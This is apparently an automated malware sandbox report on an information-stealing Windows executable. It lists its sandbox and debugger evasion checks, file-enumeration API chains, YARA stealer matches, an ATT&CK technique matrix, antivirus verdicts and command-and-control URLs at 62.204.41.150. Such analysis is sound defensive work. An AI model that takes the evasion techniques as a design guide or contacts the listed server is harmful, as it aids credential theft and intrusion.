                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-26350
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeEvaded block: after key decisiongraph_0-27510
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeAPI coverage: 6.9 %
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022DE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_022DE697
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022E3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_022E3B17
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022E4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022E4B77
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022DEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_022DEF87
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022E47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_022E47D7
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022DE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022DE077
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022DDCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_022DDCE7
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022DF8F1 FindFirstFileA,0_2_022DF8F1
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022DC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_022DC0D7
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022D1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022D1937
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022E4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_022E4107
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022DF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022DF917
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_00401160 GetSystemInfo,ExitProcess,0_2_00401160
                    Source: Amcache.hve.4.drBinary or memory string: VMware
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: RJQySowVRb.exe, 00000000.00000002.2220102140.00000000009CA000.00000004.00000020.00020000.00000000.sdmp, RJQySowVRb.exe, 00000000.00000002.2220102140.0000000000994000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: vmci.sys
                    Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: RJQySowVRb.exe, 00000000.00000002.2220001059.000000000093E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeAPI call chain: ExitProcess graph end nodegraph_0-26338
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeAPI call chain: ExitProcess graph end nodegraph_0-26349
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeAPI call chain: ExitProcess graph end nodegraph_0-26335
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeAPI call chain: ExitProcess graph end nodegraph_0-26378
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeAPI call chain: ExitProcess graph end nodegraph_0-26357
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeAPI call chain: ExitProcess graph end nodegraph_0-26177
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeAPI call chain: ExitProcess graph end nodegraph_0-27766
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeAPI call chain: ExitProcess graph end nodegraph_0-26223
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_004045C0 VirtualProtect ?,00000004,00000100,000000000_2_004045C0
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_00419750 mov eax, dword ptr fs:[00000030h]0_2_00419750
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_0094E5CB push dword ptr fs:[00000030h]0_2_0094E5CB
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022D092B mov eax, dword ptr fs:[00000030h]0_2_022D092B
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022E99B7 mov eax, dword ptr fs:[00000030h]0_2_022E99B7
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022D0D90 mov eax, dword ptr fs:[00000030h]0_2_022D0D90
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_0041CEEA SetUnhandledExceptionFilter,0_2_0041CEEA
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B33A
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022EAFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_022EAFAF
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022ED151 SetUnhandledExceptionFilter,0_2_022ED151
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022EB5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_022EB5A1
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeMemory protected: page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: RJQySowVRb.exe PID: 1968, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022E9867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_022E9867
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417B90
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_022E7DF7
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00416920
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00417A30
                    Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.2.RJQySowVRb.exe.22d0e67.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RJQySowVRb.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RJQySowVRb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RJQySowVRb.exe.2320000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RJQySowVRb.exe.22d0e67.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RJQySowVRb.exe.2320000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2220102140.0000000000979000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2034048074.0000000002320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RJQySowVRb.exe PID: 1968, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0.2.RJQySowVRb.exe.22d0e67.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RJQySowVRb.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RJQySowVRb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RJQySowVRb.exe.2320000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RJQySowVRb.exe.22d0e67.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RJQySowVRb.exe.2320000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2220102140.0000000000979000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2034048074.0000000002320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RJQySowVRb.exe PID: 1968, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                    Native API
                    1
                    DLL Side-Loading
                    11
                    Process Injection
                    1
                    Masquerading
                    OS Credential Dumping2
                    System Time Discovery
                    Remote ServicesData from Local System1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading
                    1
                    Virtualization/Sandbox Evasion
                    LSASS Memory31
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media2
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                    Disable or Modify Tools
                    Security Account Manager1
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                    Process Injection
                    NTDS11
                    Process Discovery
                    Distributed Component Object ModelInput Capture12
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information
                    LSA Secrets1
                    Account Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                    Obfuscated Files or Information
                    Cached Domain Credentials1
                    System Owner/User Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                    Software Packing
                    DCSync1
                    File and Directory Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading
                    Proc Filesystem123
                    System Information Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    RJQySowVRb.exe29%ReversingLabs
                    RJQySowVRb.exe100%AviraHEUR/AGEN.1310247
                    RJQySowVRb.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://upx.sf.net0%URL Reputationsafe
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    http://62.204.41.150/true
                      unknown
                      http://62.204.41.150/edd20096ecef326d.phptrue
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://62.204.41.150/edd20096ecef326d.phpSRJQySowVRb.exe, 00000000.00000002.2220102140.00000000009AE000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://upx.sf.netAmcache.hve.4.drfalse
                          • URL Reputation: safe
                          unknown
                          http://62.204.41.150RJQySowVRb.exe, 00000000.00000002.2220102140.0000000000979000.00000004.00000020.00020000.00000000.sdmp, RJQySowVRb.exe, 00000000.00000002.2220001059.000000000093E000.00000004.00000020.00020000.00000000.sdmptrue
                            unknown
                            http://62.204.41.150/edd20096ecef326d.phpxRJQySowVRb.exe, 00000000.00000002.2220102140.00000000009AE000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://62.204.41.150/xRJQySowVRb.exe, 00000000.00000002.2220102140.0000000000979000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://62.204.41.150/:RJQySowVRb.exe, 00000000.00000002.2220102140.00000000009AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://62.204.41.150/edd20096ecef326d.phpTRJQySowVRb.exe, 00000000.00000002.2220102140.00000000009AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://62.204.41.150/edd20096ecef326d.phpdRJQySowVRb.exe, 00000000.00000002.2220102140.00000000009AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://62.204.41.150=RJQySowVRb.exe, 00000000.00000002.2220001059.000000000093E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        62.204.41.150
                                        unknownUnited Kingdom
                                        30798TNNET-ASTNNetOyMainnetworkFItrue
